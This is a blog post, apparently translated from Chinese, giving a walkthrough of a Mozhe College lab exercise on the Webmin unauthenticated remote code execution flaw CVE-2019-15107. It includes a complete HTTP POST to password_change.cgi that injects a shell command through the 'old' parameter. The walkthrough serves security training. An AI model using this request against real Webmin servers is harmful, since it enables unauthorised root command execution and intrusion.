当前位置:网站首页>Moher College webmin unauthenticated remote code execution
Moher College webmin unauthenticated remote code execution
2022-07-04 07:44:00 【Lyswbb】
First, get to the shooting range and visit , Visit a landing page later

According to the title , Unauthorized rce, So you can look for history first CVE Number (CVE-2019-15107), After finding it, directly reproduce the vulnerability , The vulnerability lies in the password reset function :Webmin--Webmin confuration--Authentication

burp Grab traffic packets , Then change the parameters , Pay attention to the need to session_login.cgi Change to password_change.cgi, The following parameters can be copied directly , The trigger of this vulnerability point only needs to pass one expired Execute the command with parameters
POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:47372
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://124.70.64.48:47372
Referer: https://124.70.64.48:47372/session_login.cgi
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2
Directly query the root key.txt that will do

边栏推荐
- Zephyr 学习笔记2,Scheduling
- PCIE知识点-010:PCIE 热插拔资料从哪获取
- 21 examples of strategic goals to promote the rapid development of your company
- Is l1-029 too fat (5 points)
- Rapidjson reading and writing JSON files
- 2022-021rts: from the second half of the year
- [Chongqing Guangdong education] National Open University spring 2019 770 real estate appraisal reference questions
- A real penetration test
- L1-026 I love gplt (5 points)
- L1-027 rental (20 points)
猜你喜欢
随机推荐
ZABBIX monitoring system custom monitoring content
促进OKR落地的工作总结该如何写?
Node foundation ~ node operation
论文学习——基于极值点特征的时间序列相似性查询方法
L2-013 red alarm (C language) and relevant knowledge of parallel search
The text box displays the word (prompt text) by default, and the text disappears after clicking.
Heap concept in JVM
墨者学院-Webmin未经身份验证的远程代码执行
Activiti常見操作數據錶關系
【性能测试】一文读懂Jmeter
I was pressed for the draft, so let's talk about how long links can be as efficient as short links in the development of mobile terminals
rapidjson读写json文件
PCIE知识点-010:PCIE 热插拔资料从哪获取
【Go基础】2 - Go基本语句
墨者学院-PHPMailer远程命令执行漏洞溯源
手写简易版flexible.js以及源码分析
Rhcsa the next day
JVM中堆概念
Google's official response: we have not given up tensorflow and will develop side by side with Jax in the future
Guoguo took you to write a linked list, and the primary school students said it was good after reading it


![[Gurobi] 简单模型的建立](/img/3f/d637406bca3888b939bead40b24337.png)




![[C language] open the door of C](/img/e0/2f107966423d6492c39995c77a445e.jpg)
